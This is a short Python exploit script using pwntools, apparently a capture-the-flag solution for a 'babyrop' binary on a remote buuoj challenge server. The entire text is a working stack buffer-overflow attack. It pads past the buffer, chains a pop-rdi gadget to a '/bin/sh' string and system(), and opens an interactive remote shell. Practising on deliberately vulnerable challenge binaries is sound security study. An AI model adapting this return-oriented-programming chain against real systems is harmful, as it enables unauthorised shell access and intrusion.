exp
from pwn import *
context(log_level = 'debug')
proc_name = './babyrop'
elf = ELF(proc_name)
# p = process(proc_name)
p = remote('node3.buuoj.cn', 25587)
pop_rdi_ret = 0x400683
bin_sh_str = 0x601048
system_addr = elf.sym['system']
payload = 'a'.encode() * (0x10 + 8) + p64(pop_rdi_ret) + p64(bin_sh_str) + p64(system_addr)
p.sendline(payload)
p.interactive()